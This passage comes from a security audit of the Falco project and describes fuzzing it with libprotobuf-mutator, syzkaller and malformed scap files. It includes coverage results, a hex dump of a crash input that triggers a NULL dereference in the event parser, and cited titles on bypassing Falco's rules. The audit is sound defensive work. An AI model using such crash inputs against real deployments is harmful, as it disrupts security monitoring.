commands.\n5https://github.com/google/libprotobuf-mutator#integrating-with-libfuzzer\nRef: 23-01-1097-LIV 32 Quarkslab SASgit checkout 0.9.0\ngit apply sys_open_fuzz.diff\nmkdir build\ncd build\ncmake -DCMAKE_C_COMPILER=clang -DCMAKE_CXX_COMPILER=clang++ ..\nmake # try to use -j <nbthreads>\nFuzzing with LLVM libFuzzer\nUnlike HonggFuzz or AFL++, LLVM libFuzzer adds the fuzzer directly to the compiled binary.\nThus to start the fuzzing session, just execute the binary and use libFuzzer’s flags. You can find\nthe documentation on the LLVM website6to learn about the available flags and understand the\noutput format. It’s possible to run the fuzzer with multiple workers and monitor the logs using\ntailon the multiple generated files. If libFuzzer finds a crash, it will stop and generate a file\ncontaining the Protobuf message in text format7. It’s possible to provide an existing corpus with\nthe same format.\nStarting the fuzzing, the output for fuzz_sys_open should be similar to this.\nINFO: found LLVMFuzzerCustomMutator (0x934350). Disabling -len_control by default.\nINFO: Running with entropic power schedule (0xFF, 100).\nINFO: Seed: 1989839396\nINFO: Loaded 1 modules (830 inline 8-bit counters): 830 [0x20899d4, 0x2089d12),\nINFO: Loaded 1 PC tables (830 PCs): 830 [0x1d47f60,0x1d4b340),\nINFO: -max_len is not provided; libFuzzer will not generate inputs larger than 4096 bytes\nINFO: A corpus is not provided, starting from an empty corpus\n#2 INITED cov: 120 ft: 121 corp: 1/1b exec/s: 0 rss: 51Mb\nNEW_FUNC[1/3]: 0x92e630 in sys_open::event_args::~event_args()\n/home/mahe/falco-security/libs/userspace/libsinsp/test/fuzz/sys_open.pb.cc:193 ◁arrowhookleft→\nNEW_FUNC[2/3]: 0x931a00 in void google::protobuf::internal::InternalMetadata::DeleteOutOfLin ⌋\neHelper<google::protobuf::UnknownFieldSet>()\n/home/mahe/falco-security/libs/build/protobuf-prefix/src/protobuf/target/include/google/ ⌋\nprotobuf/metadata_lite.h:190◁arrowhookleft→\n◁arrowhookleft→\n◁arrowhookleft→\n#3 NEW cov: 131 ft: 136 corp: 2/11b lim: 4096 exec/s: 0 rss: 53Mb L: 10/10 MS: 7\nEraseBytes-EraseBytes-ShuffleBytes-CMP-CrossOver-ChangeBit-Custom- DE:\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"-◁arrowhookleft→\n◁arrowhookleft→\n#5 NEW cov: 133 ft: 138 corp: 3/47b lim: 4096 exec/s: 0 rss: 54Mb L: 36/36 MS: 3\nCustomCrossOver-InsertByte-Custom- ◁arrowhookleft→\n#41 REDUCE cov: 133 ft: 138 corp: 3/44b lim: 4096 exec/s: 0 rss: 67Mb L: 33/33 MS: 2\nChangeByte-Custom- ◁arrowhookleft→\n#142 REDUCE cov: 133 ft: 138 corp: 3/23b lim: 4096 exec/s: 0 rss: 104Mb L: 12/12 MS: 1 Custom-\n#278 NEW cov: 134 ft: 139 corp: 4/50b lim: 4096 exec/s: 0 rss: 153Mb L: 27/27 MS: 2\nCMP-Custom- DE: \"proto2\"- ◁arrowhookleft→\n#380 REDUCE cov: 134 ft: 139 corp: 4/40b lim: 4096 exec/s: 0 rss: 189Mb L: 17/17 MS: 4\nShuffleBytes-Custom-EraseBytes-Custom- ◁arrowhookleft→\n#811 REDUCE cov: 134 ft: 139 corp: 4/37b lim: 4096 exec/s: 811 rss: 341Mb L: 7/17 MS: 2\nCopyPart-Custom- ◁arrowhookleft→\n#4096 pulse cov: 134 ft: 139 corp: 4/37b lim: 4096 exec/s: 2048 rss: 393Mb\n#4118 REDUCE cov: 134 ft: 139 corp: 4/32b lim: 4096 exec/s: 2059 rss: 393Mb L: 7/17 MS: 5\nCustomCrossOver-ShuffleBytes-CopyPart-CopyPart-Custom- ◁arrowhookleft→\n#6326 REDUCE cov: 135 ft: 140 corp: 5/78b lim: 4096 exec/s: 1581 rss: 394Mb L: 46/46 MS: 5\nPersAutoDict-CustomCrossOver-Custom-CMP-Custom- DE: \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"-\"(NULL)\"- ◁arrowhookleft→\n#6457 REDUCE cov: 135 ft: 140 corp: 5/56b lim: 4096 exec/s: 1614 rss: 394Mb L: 24/24 MS: 1 Custom-\n6https://llvm.org/docs/LibFuzzer.html\n7https://developers.google.com/protocol-buffers/docs/text-format-spec\nRef: 23-01-1097-LIV 33 Quarkslab SAS#6918 REDUCE cov: 135 ft: 140 corp: 5/49b lim: 4096 exec/s: 1729 rss: 394Mb L: 17/17 MS: 2\nCopyPart-Custom- ◁arrowhookleft→\n#8192 pulse cov: 135 ft: 140 corp: 5/49b lim: 4096 exec/s: 1638 rss: 394Mb\n#8564 REDUCE cov: 135 ft: 140 corp: 5/48b lim: 4096 exec/s: 1712 rss: 394Mb L: 6/17 MS: 2\nCMP-Custom- DE: \"\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"- ◁arrowhookleft→\n#16384 pulse cov: 135 ft: 140 corp: 5/48b lim: 4096 exec/s: 1820 rss: 395Mb\nFuzzing the SYS_CLONE_20_X event handler\nAfter trying on sys_open , we selected a syscall that had a more complex handler on the userspace\nside.sys_clone_20_x was choosen, notably because it has a large number of arguments: twenty,\nand some could be manipulated by a simple user on the system. So we decided to mutate only the\nfields that could be influenced by an attacker, i.e. the exe path, args, comm, and flags, meaning\nthat in the end mostly string buffers were fuzzed. In the end, the fuzzing was pretty restricted\nand concerned mostly string buffers, so it was very limited and could have been checked by\na manual analysis. Unsurprisingly, in the end, fuzzing the handler with the harness did not\ntriggered crashes.\nHowever, the same method can be used to fuzz the entirety of the arguments, to find bugs that\nmay not be security relevant. Nevertheless, it confirms that writing security relevant harness can\nbe more time consuming than reviewing the code manually, considering as well that it can be\nharder to detect some issues by just reading the source and manual review should in addition of\na dynamic analysis.\nAttached to the report, you will find a git diff named, sys_clone_fuzz.diff containing both\nthe changes for the open and clone syscalls from the tag 0.9.0or more precisely, the version\nspecified in Table 3.2.\nConclusion\nFor structured fuzzing, libprotobuf-mutator is appropriate in order to create random structures,\nbut it’s a bit complex and time-consuming to setup. The drawback is mainly that multiple highly\ntargeted harnesses must be written in order to fuzz a significant amount of code, and thus find\nbugs. Manual review of the function could be more time efficient in certain situations. On top of\nthat, by creating the proto definition and the harness, we need to have a very precise knowledge\non what could be the possible inputs and not make potential false assumptions. It should be\ncombined with random fuzzing that make fewer assumptions in order to find potential issues on\nthe format itself and not just on the range of possible values.\nBecause writing and maintaining a large quantity of custom harness could be burdensome,\nwe can even project that the proto definition and C++ harness could be generated from the\nevent_table.c automatically. But again creating such program could exceed the cost in time of\na manual review.\nFor the conclusion of the specific examples, on sys_open andsys_clone_20_x , fuzzing sessions\ncould not trigger crashes with the harnesses presented in this report.\nRef: 23-01-1097-LIV 34 Quarkslab SAS7.2.2 Using syzkaller\nFor fuzzing related to syscalls, the syzkaller8project can be interesting. It’s technically an\nunsupervised coverage-guided kernel fuzzer but also a group of binaries and libraries that can be\nused separately to generate valid syscall programs and mutate them. The advantage of using this\nproject as a base for creating valid event for Falco is that multiple people already took the time to\ndescribe syscalls (their arguments, return values) in a specific domain language9.\nThere are two ways to see how syzkaller could be used on Falco.\n1.The whole syzkaller stack could be used as intended, fuzzing the entire system on which\nFalco is installed and running. The coverage will come from the system code and not from\nFalco’s so it can be seen as random fuzzing without guidance.\n2.The library in charge of mutating programs could be used to form valid Falco events (at least\nenter events). It can be used similarly as in the syz-mutate tool10. It’s still random fuzzing\nand more should be written to actually create a fuzzer from this idea: interfacing with the\nC library containing the process_event function, catching signals as a fuzzer would do,\netc.\nFor the second point, in order to get an idea of what syzkaller is capable, you can clone the\nrepository, compile the binaries and use syz-mutate to generate valid programs. Here is an\nextract mutating a lot of open(2) syscalls using ./syz-mutate --len 2000 --enable open .\n[...]\nopen$dir(&(0x7f0000146fc0)= './file64\\x00 ', 0x8840, 0x1d1)\nopen$dir(&(0x7f0000147000)= './file4aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ⌋\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ⌋\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ⌋\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ⌋\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ⌋\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ⌋\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ⌋\naaaa\\x00 ', 0x193000,\n0x40)◁arrowhookleft→\n◁arrowhookleft→\n◁arrowhookleft→\n◁arrowhookleft→\n◁arrowhookleft→\n◁arrowhookleft→\n◁arrowhookleft→\n◁arrowhookleft→\nopen(&(0x7f0000147240)= './file60\\x00 ', 0x191180, 0x44)\nopen(&(0x7f0000147280)= './file7\\x00 ', 0x40100, 0x14)\nopen$dir(&(0x7f00001472c0)= './file36\\x00 ', 0x420002, 0x32)\nopen$dir(&(0x7f0000147300)= './file1/file1/file0/file1\\x00 ', 0x240040, 0x20)\nFuzzing the Falco kernel module with syzkaller\nFor the first point, we mainly followed the syzkaller documentation11to setup a QEMU VM on a\nUbuntu host. Some small modifications are required to integrate Falco.\n8https://github.com/google/syzkaller\n9https://github.com/google/syzkaller/blob/master/docs/syscall_descriptions.md\n10https://github.com/google/syzkaller/blob/master/tools/syz-mutate/mutate.go\n11https://github.com/google/syzkaller/blob/master/docs/linux/setup_ubuntu-host_qemu-vm_\nx86-64-kernel.md\nRef: 23-01-1097-LIV 35 Quarkslab SAS•First, in the kernel config parameters, in addition to the required config options for syzkaller,\nwe also added CONFIG_KCOV_ENABLE_COMPARISONS=y . This is not required but gives better\ncoverage results based on our experiments. A second point, which is required to enable\ncoverage of dynamic loaded module and so to get Falco driver coverage, is to disable KASLR\nby adding CONFIG_RANDOMIZE_BASE .\n•Once the kernel was built, we built Falco’s driver using the same kernel source code, in order\nto get instrumentation into the module. To do this, there is just a small modification to do in\nhttps://github.com/falcosecurity/libs/blob/master/driver/Makefile.in which\ndefinesKERNELDIR as:\nKERNELDIR ?= /lib/modules/$(shell uname -r)/build\nWe just have to fix this with the folder used to build our kernel.\n•Then we need to build the Falco userland process inside the target image. To do this, we\nstarted the image with a temporary second drive (Falco is quite huge to build), cloned the\ngit repository into it, added the required packages to build everything and then happily got\nthe expected binary.\n•Finally, we added the default falco.yaml andfalco_rules.yaml configuration files and\nconfigured Falco to start as a systemd service, based on the scripts from Falco repository.\nAt this point, restart the VM and quickly check that Falco is ready:\nLinux syzkaller 5.14.0 #4 SMP Tue Nov 22 07:04:02 EST 2022 x86_64\n...\nroot@syzkaller:~# lsmod\nModule Size Used by\nfalco 1081344 2\nroot@syzkaller:~# ps axu | grep falco\nroot 207 19.4 1.4 268792 24928 ? Rsl 22:03 0:17 /usr/bin/falco\n--pidfile=/var/run/falco.pid ◁arrowhookleft→\nroot 282 8.0 0.0 11116 928 pts/0 S+ 22:04 0:00 grep falco\nroot@syzkaller:~# touch /root/whatever\nroot@syzkaller:~# tail -1 /var/log/user.log\nNov 23 22:05:16 syzkaller falco: 22:05:16.545542579: Error File below / or /root\nopened for writing (user=root user_loginuid=0 command=touch /root/whatever\npid=283 parent=bash file=/root/whatever program=touch container_id=host\nimage=<NA>)◁arrowhookleft→\n◁arrowhookleft→\n◁arrowhookleft→\nWe can now start syzkaller. A manager configuration file is required to specify various parameters,\nlike kernel image, ‘sshkey‘ to log into the vm, number of VM, etc.\nBut in addition to the documentation sample, we also need to specify two parameters, module_-\nobjandkernel_subsystem to help syzkaller retrieve information from Falco’s coverage. The\nglobal configuration we used is similar to:\n{\n\"target\" : \"linux/amd64\",\nRef: 23-01-1097-LIV 36 Quarkslab SAS\"http\": \"0.0.0.0:8080\",\n\"workdir\" : \"/home/jdoe/syzkaller/syzkaller/workdir\",\n\"kernel_obj\" : \"/home/jdoe/syzkaller/linux\",\n\"module_obj\" : [\"/home/jdoe/syzkaller/falco/build/driver\"],\n\"kernel_subsystem\" : [ { \"name\": \"falco\", \"path\":\n[\"/home/jdoe/syzkaller/falco/build/driver/src\"]}], ◁arrowhookleft→\n\"image\": \"/home/jdoe/syzkaller/image/stretch.img\",\n\"sshkey\" : \"/home/jdoe/syzkaller/image/stretch.id_rsa\",\n\"syzkaller\" : \"/home/jdoe/syzkaller/syzkaller\",\n\"procs\": 4,\n\"type\": \"qemu\",\n\"vm\": {\n\"count\": 2,\n\"kernel\" : \"/home/jdoe/syzkaller/linux/arch/x86/boot/bzImage\",\n\"cpu\": 2,\n\"mem\": 2048,\n}\n}\nRunning syzkaller is then as easy as running\n./bin/syz-manager -config=./stretch.cfg\nSyzkaller needs to start each fuzzing VM with the --snaphot option, which means that after\nrebooting, any filesystem modification is lost. But this doesn’t prevent us to ssh into a working\nVM and take a look at /var/log/user.log to check if Falco has caught some events:\nroot@syzkaller:~# grep falco /var/log/user.log\n...\nNov 23 22:37:20 syzkaller falco: Opening capture with Kernel module\nNov 23 22:37:25 syzkaller falco: 22:37:25.448433801: Error File below / or /root\nopened for writing (user=root user_loginuid=0 command=scp -t /syz-fuzzer\npid=362 parent=sshd file=/syz-fuzzer program=scp container_id=host image=<NA>)◁arrowhookleft→\n◁arrowhookleft→\nNov 23 22:37:26 syzkaller falco: 22:37:26.648266483: Error File below / or /root\nopened for writing (user=root user_loginuid=0 command=scp -t /syz-executor\npid=370 parent=sshd file=/syz-executor program=scp container_id=host\nimage=<NA>)◁arrowhookleft→\n◁arrowhookleft→\n◁arrowhookleft→\nNov 23 22:37:39 syzkaller falco: 22:37:39.810731946: Error File created below\n/dev by untrusted program (user=root user_loginuid=0 command=syz-executor.0\nexec pid=2188 file=/dev/sr0 container_id=host image=<NA>)◁arrowhookleft→\n◁arrowhookleft→\nNov 23 22:37:39 syzkaller falco: 22:37:39.832322826: Error File created below\n/dev by untrusted program (user=root user_loginuid=0 command=syz-executor.3\nexec pid=2222 file=/dev/nvram container_id=host image=<NA>)◁arrowhookleft→\n◁arrowhookleft→\n...\nThe first two events are just showing some internals from syzkaller, the syz-manager on the host\nis pushing its binaries into the vm with scp, and then the two following events show that those\nbinaries start playing with devices.\nRef: 23-01-1097-LIV 37 Quarkslab SASGathering information from the userland Falco process\nAt this point, an attentive reader will have noted that we are just able to get information from\nthe Falco driver, there is no coverage for the Falco userland process, nor even notification if this\nprocess crashes.\nIf getting coverage for a userland process would require more work to adapt Syzkaller, which was\nnot the aim of this assessment, we nevertheless thought that it would not be so complicated to\ndetect crashes. Indeed, when a userland process crashes, it is reported in the local syslog. We’ve\nalready said that syzkaller starts the VM with the --snapshot option, so to keep track of those\npotential crashes through reboots, we just configured the VM syslog to forward interesting events\nto the host syslog.\nThis required very few modifications of our image, and a small fix in the way syzkaller is starting\nthe QEMU VM, due to the --restrict option used by syzkaller to isolate the guest and the host\nnetwork, obviously to prevent bad things to happen to the host. QEMU provides an option to\nexpose a listening socket on the host side inside the guest, thanks to the guestfwd options. Be\ncareful, the port must be bound beforestarting QEMU.\n•So the code configuring the network stack of QEMU VM in /vm/qemu/qemu.go has been\nfixed by:\ndiff --git a/vm/qemu/qemu.go b/vm/qemu/qemu.go\nindex d9933fa05..eac312f66 100644\n--- a/vm/qemu/qemu.go\n+++ b/vm/qemu/qemu.go\n@@ -435,7 +435,8 @@ func (inst *instance) boot() error {\nargs = append(args, splitArgs(inst.cfg.QemuArgs, templateDir,\ninst.index)...) ◁arrowhookleft→\nargs = append(args,\n\"-device\", inst.cfg.NetDev+\",netdev=net0\",\n- \"-netdev\",\nfmt.Sprintf(\"user,id=net0,restrict=on,hostfwd=tcp:127.0.0.1:%v-:22\",\ninst.port))◁arrowhookleft→\n◁arrowhookleft→\n+ \"-netdev\",\nfmt.Sprintf(\"user,id=net0,restrict=on,hostfwd=tcp:127.0.0.1:%v-:22\"+ ◁arrowhookleft→\n+ \",guestfwd=tcp:10.0.2.1:514-tcp:127.0.0.1:514\",\ninst.port)) ◁arrowhookleft→\nif inst.image == \"9p\" {\n•In the VM image, in /etc/rsyslog.conf , two new actions were added to forward kernel\nand user events to the exposed remote TCP service: kern.* @@10.0.2.1:514 anduser.*\n@@10.0.2.1:514 . Indeed, the only events received with the user facility are Falco events,\nwhich enable us to also have a log on the host of all triggered events.\n•The syslog startup must be postponed after the network setup, by adding to the [Unit]\npart of/etc/systemd/system/syslog.service\nAfter=network.target auditd.service\nRef: 23-01-1097-LIV 38 Quarkslab SAS•And to try to get some information in case of a crash, at least a stack trace, kernel.core_-\npattern was configured with a custom script which just calls coredumpctl info $1 |\nlogger -p user.notice after having executed systemd-coredump .\n•Finally, Falco was recompiled with ASAN, in order to get potential memory error under\nheavy syscalls load.\nResults\nAfter a 48 hours run of syzkaller, Falco kernel driver did not cause any crash. See Table 7.1 for\nmore information. Nevertheless, other crashes were found, like a general protection fault in\nscsi_queue_rq . However those bugs have already been caught and reported by syzbot12.\nuptime 32h345s\nfuzzing 49h41m0s\ncorpus 10540\nsignal 130782\ncoverage 86763\nsyscalls 2125\ncrash types 10 (0/hour)\ncrashes 28 (0/hour)\nexec total 6557347 (55/sec)\nTable 7.1: Syzkaller fuzzing campaign stats results\nSee Table 7.2 for coverage information on the Falco kernel module.\nfilename covergae basic block\nfalco/build/driver/src 57% (81%) of 3660(2574)\nmain.c 16% (52%) of 568(175)\nppm_cputime.c — of 1\nppm_events.c 40% (46%) of 385(337)\nppm_fillers.c 68% (89%) of 2705(2062)\nppm_flag_helpers.h 100% (0%) of 1(0)\nTable 7.2: Coverage on Falco kernel module code\nClearly, when syzkaller starts its fuzzing process inside the VM, Falco is already started and the\ndriver loaded, so there is no reason to see coverage, for example, for various parts of main.c,\nas the one which handles driver initialization or the file_operations used when a userland\nprocess opens the falco driver or memory map it.\n12https://syzkaller.appspot.com/upstream\nRef: 23-01-1097-LIV 39 Quarkslab SASAn interesting point is the coverage of ppm_fillers.c , which contains a hook for each syscall in\norder to extract its parameters, and gives a good idea of which syscall has been reached by the\nfuzzer. See the following Table 7.3, for a small extract of the coverage for the f_sys_xxx_e|x\nhandled in this source file. The full HTML coverage report will be included with this report under\nthe file name syzkaller-kernel-module-coverage.html.gz .\nfunction name coverage basic block\n... ... ...\nf_sys_accept4_e 100% of 1\nf_sys_accept_x 83% of 17\nf_sys_access_e — of 10\nf_sys_bpf_x — of 1\nf_sys_brk_munmap_mmap_x — of 7\nf_sys_capset_x 98% of 250\nf_sys_chmod_x 94% of 33\nf_sys_connect_e 80% of 20\nf_sys_connect_x 75% of 16\nf_sys_copy_file_range_e — of 13\nf_sys_copy_file_range_x — of 7\nf_sys_creat_e 95% of 34\nf_sys_creat_x 96% of 43\n... ... ...\nTable 7.3: Coverage on the Falco kernel module fillers\nCoverage of ppm_events.c , which contains various tool functions used by ppm_fillers.c to\nextract the syscall arguments, is also interesting, see the following Table 7.4.\nRef: 23-01-1097-LIV 40 Quarkslab SASfunction name coverage basic block\naddr_to_kernel 100% of 5\ncompat_parse_readv_writev_bufs — of 26\ncompute_snaplen 2% of 150\ndpi_lookahead_init — of 1\nf_sys_autofill 85% of 13\nfd_to_socktuple 60% of 61\npack_addr 91% of 11\nparse_readv_writev_bufs 97% of 26\nppm_copy_from_user 100% of 4\nppm_strncpy_from_user 100% of 11\nsock_getname — of 21\nval_to_ring 86% of 56\nTable 7.4: Coverage of function in ppm_events.c\nMost of the missed code comes from the compute_snaplen , which has been manually reviewed.\nConcerning the Falco userland process, once again, no crash. And yet, we can see it was in high\ndemand thanks to the various syscall event drop present in the Falco notifications:\nDec 2 07:43:31 syzkaller falco: 07:43:24.933425157: Debug Falco internal: syscall\nevent drop. 10551 system calls dropped in last second. ◁arrowhookleft→\n(ebpf_enabled=0 n_drops=10551 ... n_drops_buffer_total=10551 ... n_evts=14714)\nConclusion\nSyzkaller appeared to be an interesting option for blackbox fuzzing of Falco’s solution, enabling\nto challenge both the driver and userland application at a high level rate of event, and being able\nto trigger complex syscall chain. Falco showed no weakness in dealing with this large amount of\nunusual events, despite long fuzzing sessions.\nAwaytoimprovethisfuzzingsolution, wouldbetoadduserlandprocesscoveragetothissyzkaller\nbased solution in to better guide the fuzzer.\n7.2.3 Using the scap file format\nFalco can, in addition of the live capture from the kernel module or eBPF probes, read files in\nthescapfile format13to process and filter the events based on the content. The sysdig tool14\ncan capture syscalls event and generate such file in the scapformat. Falco maintainers kindly\n13Thescapformat is a flavor of the, often used for network, pcapfile format. Note that Gerald Combs, the creator\nand maintainer of Wireshark was hired by Sysdig, the initial parent company of Falco.\n14https://github.com/draios/sysdig\nRef: 23-01-1097-LIV 41 Quarkslab SASdirected us toward a repository, sysflow-telemetry/sf-collector where some specific scapfiles are\navailable15.\nFor fuzzing directly the file format, inspiration was taken from the very helpful examples in the\nlibs/libsinsp folder16keeping only the part concerning the SAVEFILE engine. You can find the\ncomplete harness in the git diff file named fuzz_file.diff attached to the report. The binary\nwas compiled with ASAN.\nThe issue is that, as expected, the fuzzing mostly uncovered crashes from the file decoding part\nsince these files input are what we could call “corrupted”, for example having a header “lying”\nabout the content of the body. It seems that the file engine and the event processor assume that\nfile should be valid which is reasonable. Indeed these crashes are not critical because they are\nonly concerning a Falco instance that was ran especially for filtering and investigating about the\ncontent of the files.\nOn top of that, fuzzing is particularly slow (around 50/100 execution per second), which might\nbe because the code parsing the file is actually making a lot of read(2) syscalls, which is not\nideal in terms of performance. But for an unclear reason a lot of the execution timeout after 1s\nor a bit more which slows everything down (it might be related to ASAN but it’s not clear). In\norder to find out, it would be reasonable to first fix all the previous crash, which would imply to\nrefactor some parts of the parsing more defensively.\nAn archive with the name fuzz-scap-file-results.tar.gz contains the results of a small\nsession of fuzzing, around an hour in total. The file ending in .fuzzcan be used as input of the\nharness to provoke the crash their name indicates. Usually a good idea is to build the harness\nwithout optimization, using -O0, not-Og, and debugging with the help of gdb, for example, to\nfind the root of the crash. Please note that some inputs only generate crash because of ASAN but\nare silent memory bug without the sanitizer enabled. Inputs starting with SIGVTALRM are inputs\nthat somehow created an execution timeout (still unclear why and maybe not the priority).\nExample of crash using malformed scap file\nHereisanexampletoillustrate, let’sarbitrarytakethesmallestcrashinputgeneratedforconcision\nreason. The name of the file (see HonggFuzz documentation on how to read the name17),\nisSIGSEGV.PC.5555560369be.STACK.c30617a76.CODE.1.ADDR.55575e149b22.INSTR.mov__-\n__(%rax),%rax.fuzz\n00000000 : 0a0d 0d0a 1c00 0000 4d3c 2b1a 0100 0200 ffff ffff ........M<+.........\n00000014 : ffff ffff 1c00 0000 2102 0000 c000 0000 1000 0000 ........!...........\n00000028 : 00e0 dbb8 fe61 7269 612d 3235 362d 6163 6dff 0f00 .....aria-256-acm...\n0000003c : 7377 00ff 0000 0000 0000 3863 6439 6430 6631 3438 sw........8cd9d0f148\n00000050 : 3438 0000 0000 0000 0000 0000 0000 0000 0000 0000 48..................\n00000064 : 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 ....................\n00000078 : 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 ....................\n0000008c : 0000 0000 0000 0000 0000 0000 0000 0063 7075 5f73 ...............cpu_s\n000000a0 : 6800 0000 0000 0000 0000 0000 0000 0000 0000 0000 h...................\n15https://github.com/sysflow-telemetry/sf-collector/tree/master/tests\n16https://github.com/falcosecurity/libs/tree/master/userspace/libsinsp/examples\n17https://github.com/google/honggfuzz/blob/master/docs/USAGE.md#output-files\nRef: 23-01-1097-LIV 42 Quarkslab SAS000000b4 : 0000 0000 0000 0000 0000 00f1 0000 0000 0000 0000 ....................\n000000c8 : 0063 6173 7435 2d65 6362 0000 0000 0000 0000 0000 .cast5-ecb..........\n000000dc : 0000 0000 0000 0000 ff00 0000 0000 0001 0000 0000 ....................\n000000f0 : 0000 ..\nThisinputwillcausetoprogramtostopon segmentation fault becauseofaNULLpointerderef-\nerencesinsp_parser::parse_clone_exit atlibs/userspace/libsinsp/parsers.cpp:1017 . Indeed\nthe faulty code is illustrated in the following listing.\n1015parinfo = evt->get_param(0);\n1016[...] // there is an assert here.\n1017childtid = *( int64_t *)parinfo->m_val;\nTheparinfo variable has for type sinsp_evt_param which could be simplified to this C structure.\nstruct sinsp_evt_param {\nchar* m_val; ///< Pointer to the event parameter data.\nuint32_t m_len; ///< Length of the parameter pointed by m_val.\n};\nIn the case of this malformed scap file, the function behind get_param will return a sinsp_-\nevt_param instance with m_valbeing a NULL pointer thus provoking the error on the NULL\ndereference in the next line of the example, line 1017 of the parsers.cpp file.\nINFO 9 Multiple crashes in the parsing of scap files and event buffer with malformed files\nCategory Null dereference\nRating Impact: Availability Exploitability : Easy\nConclusion\nAlthough the results of this fuzzing campaign reveal really concrete bugs, it seems that they can\nonly be triggered locally with malformed scap files, which reduce drastically the criticality of these\ncrashes. The challenge that we encounter in this Section 7.2 is exactly to overcome these bugs,\ntrying to find crashes that can be triggered by real events, encoded by the kernel counterpart of\nFalco, without breaking the encoding.\nFixing these issues would make Falco more robust but would not significantly make this form\nof fuzzing better, since most of the input generated by the random fuzzer would still be invalid\nencoding, and thus discarded by Falco. To illustrate how unstructured fuzzing is inappropriate\nin this situation, we could see that as fuzzing, for example, a TCP segment without knowing\nthe structure of the headers and not fixing the checksum. Most of the input generated will hit a\nvalidation wall and stay at the very early stage of the program execution.\nRef: 23-01-1097-LIV 43 Quarkslab SAS7.3 Conclusion\nFuzzing the core of Falco proved to be non-trivial because of the complexity of the events parser\ninputs. We approached this problem with different strategies. First trying to fuzz specifically some\nparsers with libprotobuf-mutator and highly structured fuzzing. Then doing black box fuzzing\nof Falco and its driver via syzkaller. And finally trying to do random fuzzing using the scap file\nformat. These approaches have limitations but the syzkaller and libprotobuf-mutator technics\ncould be useful to discover real bugs.\nRef: 23-01-1097-LIV 44 Quarkslab SAS8 Conclusion\nTo conclude, Quarkslab provided many leads and strategies on how to implement static and\ndynamic security analysis of the Falco project in the restricted amount of time. This audit also\nunveiledsomeissuesinthecodebase, thankstotheautomatedtoolsandthemanualinvestigations,\nbut nothing critical or exploitable in the end.\nOverall, it was a pleasure to work with the Falco maintainers on this audit, they were very helpful\nand willing to make the project more secure.\nRef: 23-01-1097-LIV 45 Quarkslab SASGlossary\nASANAddress Sanitizer is a memory error detector for C and C++, find more information in\nits documentation https://github.com/google/sanitizers/wiki/AddressSanitizer .\nCNCFThe Cloud Native Computing Foundation (CNCF) is a Linux Foundation project that was\nfounded in 2015 to help advance container technology and align the tech industry around\nits evolution.\npersistent mode In persistent mode, fuzzers fuzzes a target multiple times in a single forked\nprocess, instead of forking a new process for each fuzz execution. This is the most effective\nway to fuzz, as the speed can easily be x10 or x20 times faster without any disadvantages.\nPersistent mode requires that the target can be called in one or more functions, and that\nit’s state can be completely reset so that multiple calls can be performed without resource\nleaks, and that earlier runs will have no impact on future runs.\nprotobuf Protocol Buffers (a.k.a., protobuf) are Google’s language-neutral, platform-neutral,\nextensible mechanism for serializing structured data. See the documentation for more\ninformation https://developers.google.com/protocol-buffers/ .\nRef: 23-01-1097-LIV 46 Quarkslab SASBibliography\n[1]Falco maintainers. Build Falco from source . The Falco documentation. url:https://falco.\norg/docs/getting-started/source/ (visited on Dec. 6, 2022) (cit. on p. 6).\n[2]Dr.-Ing. M. Heiderich, M. Wege, MSc. N. Krein, MSc. D. Weißer, B. Walny, BSc. J. Hector,\nand J. Larsson. Pentest-Report Falco . July 24, 2019. url:https://cure53.de/pentest-\nreport_falco.pdf (visited on Dec. 5, 2022) (cit. on p. 6).\n[3]Hi120ki. Discuss about fundamental solution of detecting symlink file based bypass method\n#2203.Sept.13,2022. url:https://github.com/falcosecurity/falco/issues/2203\n(visited on Dec. 6, 2022) (cit. on p. 6).\n[4]Mark Manning. Container Runtime Security Bypasses on Falco . Sept. 15, 2019. url:https:\n//www.antitree.com/2019/09/container-runtime-security-bypasses-on-falco/\n(visited on Dec. 19, 2022) (cit. on p. 6).\n[5]Brad Geesaman. Falco Default Rule Bypass . Sept. 11, 2020. url:https://web.archive.\norg/web/20220605221820/https://darkbit.io/blog/falco-rule-bypass (visited\non Dec. 19, 2022) (cit. on p. 6).\n[6]Leonardo Di Donato. Bypass Falco . May 4, 2021. url:https://www.youtube.com/watch?\nv=nGqWskXRSmo (visited on Dec. 19, 2022) (cit. on p. 6).\n[7]Shay Berkovich. Bypassing Falco - How to compromise a cluster without tripping the SOC .\nJuly 15, 2021. url:https://github.com/blackberry/Falco-bypasses (visited on\nDec. 19, 2022) (cit. on p. 6).\n[8]Jason Dellaluce and Federico Di Pierro. Monitoring new syscalls with Falco . The Falco Blog.\nJan. 17, 2022. url:https://falco.org/blog/falco-monitoring-new-syscalls/\n(visited on Dec. 5, 2022) (cit. on p. 6).\n[9]inOva.Falco Design Principle Analysis . Chinese. Jan. 10, 2021. url:https://driverxdw.\ngithub.io/2021/01/10/Falco-Design-Principle-Analysis/ (visited on Dec. 5,\n2022) (cit. on p. 6).\n[10]inOva.Sysdig Source Code Analysis . Chinese. Part 1 https://driverxdw.github.io/\n2021/05/29/Sysdig-Source-Code-Analysis/ and part 2 https://driverxdw.github.\nio/2021/06/27/Sysdig-Source-Code-Analysis-II/ . May 29, 2021. (Visited on Dec. 5,\n2022) (cit. on p. 6).\n[11]Mark Stemm. CVE-2019-8339, a Falco capacity related vulnerability . 